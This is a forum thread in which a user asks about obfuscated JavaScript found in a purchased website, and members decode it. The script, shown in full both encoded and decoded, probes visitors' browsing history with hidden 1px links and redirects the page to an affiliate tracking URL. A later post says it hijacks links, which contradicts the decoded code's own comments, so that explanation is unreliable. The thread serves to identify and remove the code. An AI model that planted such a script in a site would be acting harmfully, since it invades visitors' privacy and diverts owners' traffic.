
need help deciphering

Discussion in 'PHP & Perl' started by theWombat, Mar 12, 2011.

  1. theWombat

    theWombat Regular Member

    found this bit of code in a site i bought, can anyone tell me what the hell it is?

    Code:
    <script> 
    // Review note: every string literal in _0xda61 is written as \xNN hex escapes (for example
    // "\x68\x74\x74\x70" is "http"); nothing is encrypted, so decoding the escapes recovers the script.
    // Decoded, the array holds a list of site URLs (indexes 0-58), one tracking URL (index 59, used as
    // cloakurl), three CSS fragments and the DOM names used below: write, div, createElement, id, nicked,
    // appendChild, body, a, href, innerHTML, offsetHeight, location.
    // The statements after the array write the CSS, append one <a> per URL to a 1px-high div and assign
    // window.location = cloakurl whenever an anchor's offsetHeight equals 1.
    // The hard line breaks inside the literals appear to come from the forum wrapping the paste.
    var _0xda61=["\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x69\x63\x6B\x65\x64\x66\x69\x72\x65\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x64\x69\x67\x69\x74\x61\x6C\x70\x6F\x69\x6E\x74\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x69\x74\x65\x70\x6F\x69\x6E\x74\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6D\x75\x6E\x64\x6F\x6D\x65\x64\x69\x61\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x63\x78\x64\x69\x67\x69\x74\x61\x6C\x6D\x65\x64\x69\x61\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6E\x65\x76\x65\x72\x62\x6C\x75\x65\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x63\x6C\x69\x63\x6B\x62\x6F\x6F\x74\x68\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x70\x70\x76\x70\x6C\x61\x79\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x70\x70\x76\x70\x6C\x61\x79\x62\x6F\x6F\x6B\x2E\x6E\x65\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x70\x70\x76\x70\x6C\x61\x79\x62\x6F\x6F\x6B\x2E\x6E\x65\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x68\x79\x64\x72\x61\x6E\x65\x74\x77\x6F\x72\x6B\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x70\x69\x6E\x6E\x61\x63\x6C\x65\x64\x72\x65\x61\x6D\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x70\x61\x72\x74\x6E\x65\x72\x73\x2E\x70\x69\x6E\x6E\x61\x63\x6C\x65\x64\x72\x65\x61\x6D\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x70\x61\x72\x74\x6E\x65\x72\x73\x2E\x70\x69\x6E\x6E\x61\x63\x6C\x65\x64\x72\x65\x61\x6D\x2E\x63\x6F\x6D\x2F\x6C\x6F\x67\x69\x6E\x2E\x70\x64\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x64\x73\x34\x64\x6F\x75\x67\x68\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x34\x64\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x65\x61\x64\x76\x74\x72\x61\x63\x6B\x65\x72\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x65\x61\x64\x76\x74\x72\x61\x63\x6B\x65\x72\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F
\x77\x77\x77\x2E\x74\x72\x61\x66\x66\x69\x63\x76\x61\x6E\x63\x65\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x74\x72\x61\x66\x66\x69\x63\x76\x61\x6E\x63\x65\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x6C\x65\x61\x64\x69\x6D\x70\x61\x63\x74\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x6C\x65\x61\x64\x69\x6D\x70\x61\x63\x74\x2E\x63\x6F\x6D\x2F\x44\x65\x66\x61\x75\x6C\x74\x2E\x61\x73\x70\x78","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x65\x77\x61\x6E\x65\x74\x77\x6F\x72\x6B\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6D\x65\x64\x69\x61\x74\x72\x75\x73\x74\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x6B\x6D\x67\x2E\x63\x6F\x6D\x2F","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x63\x6F\x70\x65\x61\x63\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x2E\x6B\x69\x6E\x67\x74\x72\x6B\x2E\x63\x6F\x6D\x2F","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x73\x2E\x63\x6F\x70\x65\x61\x63\x2E\x63\x6F\x6D\x2F\x70\x61\x72\x74\x6E\x65\x72\x73\x2F","\x68\x74\x74\x70\x3A\x2F\x2F\x72\x65\x76\x65\x6E\x75\x65\x61\x64\x73\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x76\x65\x72\x74\x69\x73\x65\x72\x2E\x61\x64\x6F\x6E\x6E\x65\x74\x77\x6F\x72\x6B\x2E\x63\x6F\x6D\x2F\x61\x64\x6F\x6E\x6E\x65\x74\x77\x6F\x72\x6B\x2F\x61\x63\x63\x6F\x75\x6E\x74\x48\x6F\x6D\x65\x2E\x68\x74\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x76\x65\x72\x74\x69\x73\x65\x72\x2E\x61\x64\x6F\x6E\x6E\x65\x74\x77\x6F\x72\x6B\x2E\x63\x6F\x6D\x2F\x61\x64\x6F\x6E\x6E\x65\x74\x77\x6F\x72\x6B\x2F\x6C\x6F\x67\x69\x6E\x2E\x68\x74\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6D\x65\x64\x69\x61\x74\x72\x61\x66\x66\x69\x63\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x73\x2E\x65\x61\x67\x6C\x65\x77\x65\x62\x61\x73\x73\x65\x74\x73\x2E\x63\x6F\x6D\x2F\x48\x6F\x6D\x65\x2E\x61\x73\x70\x78","\x68\x74\x74\x70\x3A\x2F\x2F\x66\x75\x74\x75\x7
2\x65\x61\x64\x73\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x75\x74\x75\x72\x65\x61\x64\x73\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x75\x74\x75\x72\x65\x61\x64\x73\x2E\x63\x6F\x6D\x2F\x6C\x6F\x67\x69\x6E\x2E\x70\x68\x70","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x63\x70\x61\x66\x75\x65\x6C\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x63\x70\x61\x66\x75\x65\x6C\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x64\x73\x2E\x63\x70\x61\x66\x75\x65\x6C\x2E\x63\x6F\x6D\x2F\x70\x61\x72\x74\x6E\x65\x72\x73\x2F","\x68\x74\x74\x70\x3A\x2F\x2F\x6E\x69\x63\x6B\x79\x63\x61\x6B\x65\x73\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6E\x69\x63\x6B\x79\x63\x61\x6B\x65\x73\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x68\x6F\x65\x6D\x6F\x6E\x65\x79\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x68\x6F\x65\x6D\x6F\x6E\x65\x79\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x61\x66\x66\x70\x6F\x72\x74\x61\x6C\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x66\x66\x70\x6F\x72\x74\x61\x6C\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x6A\x6F\x6E\x61\x74\x68\x61\x6E\x76\x6F\x6C\x6B\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6A\x6F\x6E\x61\x74\x68\x61\x6E\x76\x6F\x6C\x6B\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x69\x61\x6E\x66\x65\x72\x6E\x61\x6E\x64\x6F\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x69\x61\x6E\x66\x65\x72\x6E\x61\x6E\x64\x6F\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x74\x79\x6C\x65\x72\x63\x72\x75\x7A\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x74\x79\x6C\x65\x72\x63\x72\x75\x7A\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x70\x70\x63\x2D\x63\x6F\x61\x63\x68\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x70\x70\x63\x2D\x63\x6F\x61\x63\x68\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x61\x63\x6A\x6F\x68\x6E\x73\x6F\x6E\x2E\x63\x6F\x6D","\x68\x74\x74\x70
\x3A\x2F\x2F\x77\x77\x77\x2E\x7A\x61\x63\x6A\x6F\x68\x6E\x73\x6F\x6E\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x62\x65\x72\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x75\x62\x65\x72\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x62\x72\x79\x6E\x2E\x6D\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x62\x72\x79\x6E\x2E\x6D\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x69\x6C\x69\x74\x72\x61\x63\x2E\x63\x6F\x6D\x2F\x43\x6C\x69\x63\x6B\x2E\x61\x73\x70\x78\x3F\x74\x69\x64\x3D\x41\x45\x45\x43\x35\x39\x34\x39\x39\x35\x45\x41\x44\x30\x32\x43\x31\x38\x38\x35\x42\x44\x39\x46\x38\x32\x37\x45\x31\x46\x38\x37\x33\x46\x42\x34\x30\x43\x41\x30\x45\x41\x46\x43\x34\x37\x37\x44\x26\x46\x69\x6C\x69\x41\x66\x66\x3D\x31\x37\x39\x38\x30\x26\x73\x69\x64\x3D\x63\x61\x66\x66\x73","\x3C\x73\x74\x79\x6C\x65\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x63\x73\x73\x22\x3E\x23\x6E\x69\x63\x6B\x65\x64\x20\x61\x3A\x6C\x69\x6E\x6B\x7B\x63\x6F\x6C\x6F\x72\x3A\x23\x66\x66\x66\x3B\x7D","\x77\x72\x69\x74\x65","\x23\x6E\x69\x63\x6B\x65\x64\x20\x61\x3A\x76\x69\x73\x69\x74\x65\x64\x7B\x68\x65\x69\x67\x68\x74\x3A\x31\x70\x78\x3B\x77\x69\x64\x74\x68\x3A\x31\x70\x78\x3B\x64\x69\x73\x70\x6C\x61\x79\x3A\x62\x6C\x6F\x63\x6B\x3B\x6F\x76\x65\x72\x66\x6C\x6F\x77\x3A\x68\x69\x64\x64\x65\x6E\x3B\x6D\x61\x72\x67\x69\x6E\x3A\x31\x70\x78\x3B\x7D","\x23\x6E\x69\x63\x6B\x65\x64\x7B\x66\x6F\x6E\x74\x2D\x73\x69\x7A\x65\x3A\x31\x70\x78\x3B\x6F\x76\x65\x72\x66\x6C\x6F\x77\x3A\x68\x69\x64\x64\x65\x6E\x3B\x68\x65\x69\x67\x68\x74\x3A\x31\x70\x78\x3B\x6D\x61\x72\x67\x69\x6E\x3A\x30\x3B\x70\x61\x64\x64\x69\x6E\x67\x3A\x30\x3B\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x6E\x69\x63\x6B\x65\x64","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x61","\x68\x72\x65\x66","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x6F\x66\x66\x7
3\x65\x74\x48\x65\x69\x67\x68\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];var searchurls=[_0xda61[0],_0xda61[1],_0xda61[2],_0xda61[1],_0xda61[3],_0xda61[4],_0xda61[5],_0xda61[6],_0xda61[7],_0xda61[8],_0xda61[9],_0xda61[10],_0xda61[11],_0xda61[12],_0xda61[13],_0xda61[14],_0xda61[15],_0xda61[16],_0xda61[17],_0xda61[18],_0xda61[19],_0xda61[20],_0xda61[21],_0xda61[22],_0xda61[23],_0xda61[24],_0xda61[25],_0xda61[26],_0xda61[27],_0xda61[28],_0xda61[29],_0xda61[30],_0xda61[31],_0xda61[32],_0xda61[33],_0xda61[34],_0xda61[35],_0xda61[36],_0xda61[37],_0xda61[38],_0xda61[39],_0xda61[40],_0xda61[41],_0xda61[42],_0xda61[43],_0xda61[44],_0xda61[45],_0xda61[46],_0xda61[47],_0xda61[48],_0xda61[49],_0xda61[50],_0xda61[51],_0xda61[52],_0xda61[53],_0xda61[54],_0xda61[55],_0xda61[56],_0xda61[57],_0xda61[58]];var cloakurl=_0xda61[59];document[_0xda61[61]](_0xda61[60]);document[_0xda61[61]](_0xda61[62]);document[_0xda61[61]](_0xda61[63]);var c=document[_0xda61[65]](_0xda61[64]);c[_0xda61[66]]=_0xda61[67];document[_0xda61[69]][_0xda61[68]](c);for(i in searchurls){var temp=document[_0xda61[65]](_0xda61[70]);temp[_0xda61[71]]=searchurls[i];temp[_0xda61[72]]=searchurls[i];c[_0xda61[68]](temp);if(temp[_0xda61[73]]==1){window[_0xda61[74]]=cloakurl;} ;} ;
    </script>
     
  2. crazyflx

    crazyflx Elite Member

    That, my friend, is obfuscated javascript code. Obfuscated javascript just means taking regular javascript code and rendering it unreadable via a "quick and dirty" encoding (it is not real encryption: here every string is simply written out as \x hex escapes)...the bad part about obfuscated javascript code is that it is easily decoded.

    Here is a site that will give you an example of obfuscating javascript code: http://www.javascriptobfuscator.com/

    The obfuscated code you posted, actually says the following:


    Code:
    // Decoded form of the obfuscated <script> posted above. What the statements do, in order:
    //   1. write a stylesheet for an element with id "nicked",
    //   2. append one <a> per entry of searchurls to that element,
    //   3. navigate the whole page to cloakurl as soon as one of those anchors measures 1px high.
    // Nothing here rewrites or intercepts existing links on the page; the only navigation is the
    // window.location assignment at the bottom.
    // NOTE(review): the #nicked a:visited rule is the only rule that gives an anchor height:1px, so the
    // offsetHeight test looks like a CSS :visited probe of the visitor's browsing history (does the
    // browser already know any of these URLs?) - confirm in a sandboxed browser before relying on this.

    // URLs that are probed; 'http://www.digitalpoint.com' appears twice, as in the obfuscated original.
    var searchurls = ['http://www.wickedfire.com', 'http://www.digitalpoint.com', 'http://www.sitepoint.com', 'http://www.digitalpoint.com', 'http://www.mundomedia.com', 'http://www.cxdigitalmedia.com', 'http://www.neverblue.com', 'http://www.clickbooth.com', 'http://www.ppvplaybook.com', 'http://ppvplaybook.net', 'http://www.ppvplaybook.net', 'http://www.hydranetwork.com', 'http://www.pinnacledream.com', 'http://partners.pinnacledream.com', 'https://partners.pinnacledream.com/login.pdm', 'http://www.ads4dough.com', 'http://www.a4d.com', 'http://eadvtracker.com', 'http://www.eadvtracker.com', 'http://www.trafficvance.com', 'http://trafficvance.com', 'https://www.leadimpact.com', 'https://www.leadimpact.com/Default.aspx', 'http://www.ewanetwork.com', 'http://www.mediatrust.com', 'http://www.akmg.com/', 'http://www.copeac.com', 'http://affiliate.kingtrk.com/', 'https://affiliates.copeac.com/partners/', 'http://revenueads.com', 'http://advertiser.adonnetwork.com/adonnetwork/accountHome.htm', 'http://advertiser.adonnetwork.com/adonnetwork/login.htm', 'http://www.mediatraffic.com', 'http://affiliates.eaglewebassets.com/Home.aspx', 'http://futureads.com', 'http://www.futureads.com', 'http://www.futureads.com/login.php', 'http://www.cpafuel.com', 'http://cpafuel.com', 'https://ads.cpafuel.com/partners/', 'http://nickycakes.com', 'http://www.nickycakes.com', 'http://www.shoemoney.com', 'http://shoemoney.com', 'http://affportal.com', 'http://www.affportal.com', 'http://jonathanvolk.com', 'http://www.jonathanvolk.com', 'http://ianfernando.com', 'http://www.ianfernando.com', 'http://www.tylercruz.com', 'http://tylercruz.com', 'http://www.ppc-coach.com', 'http://ppc-coach.com', 'http://zacjohnson.com', 'http://www.zacjohnson.com', 'http://uberaffiliate.com', 'http://www.uberaffiliate.com', 'http://bryn.me', 'http://www.bryn.me'];
    // Redirect target: a third-party click-tracking URL carrying tid / FiliAff / sid parameters.
    var cloakurl = 'http://www.filitrac.com/Click.aspx?tid=AEEC594995EAD02C1885BD9F827E1F873FB40CA0EAFC477D&FiliAff=17980&sid=caffs';
    // The <style> element is emitted in three document.write calls; together they make #nicked a
    // 1px-high, overflow-hidden box with 1px text, colour unvisited links white, and turn visited
    // links into 1px x 1px blocks. The probe anchors are therefore effectively invisible on the page.
    document['write']('<style type="text/css">#nicked a:link{color:#fff;}');
    document['write']('#nicked a:visited{height:1px;width:1px;display:block;overflow:hidden;margin:1px;}');
    document['write']('#nicked{font-size:1px;overflow:hidden;height:1px;margin:0;padding:0;}</style>');
    // Container for the probe anchors; needs document.body to exist when this runs.
    var c = document['createElement']('div');
    c['id'] = 'nicked';
    document['body']['appendChild'](c);
    // `i` is never declared, so it becomes an implicit global; for...in walks the array's keys.
    for (i in searchurls) {
        var temp = document['createElement']('a');
        temp['href'] = searchurls[i];
        temp['innerHTML'] = searchurls[i];
        c['appendChild'](temp);
        // Layout read-back: an anchor measuring exactly 1px high triggers the redirect.
        // NOTE(review): current browsers restrict which properties :visited may change (colour-type
        // properties only), so this layout-based test is not expected to distinguish visited links
        // there - verify per browser. The script should be removed from the site either way.
        if (temp['offsetHeight'] == 1) {
            window['location'] = cloakurl;
        };
    };
     
    Last edited: Mar 12, 2011
  3. crazyflx

    crazyflx Elite Member

    After chatting with some people who know a little more about javascript than I do (thanks cheesecheese & CHAFO), it seems as though anytime you link to one of the sites mentioned in that first line of unobfuscated code, it is going to actually link to their affiliate link (which for me, goes to a free credit report offer).

    Not only that, but if you were to mouseover the link or even view it in the source code, it is going to appear as though it links to the appropriate location.

    I'm going to take a guess, and say you purchased some sort of internet marketing site/blog.
     
  4. theWombat

    theWombat Regular Member

    so essentially they're trying to jack all my clicks (ppv lander)
     
  5. crazyflx

    crazyflx Elite Member

    Basically, yes.

    Remove the code and you should be alright, but I'd keep a keen eye out for anything else...and please, wherever you bought that at, publicly tear the guy apart ;)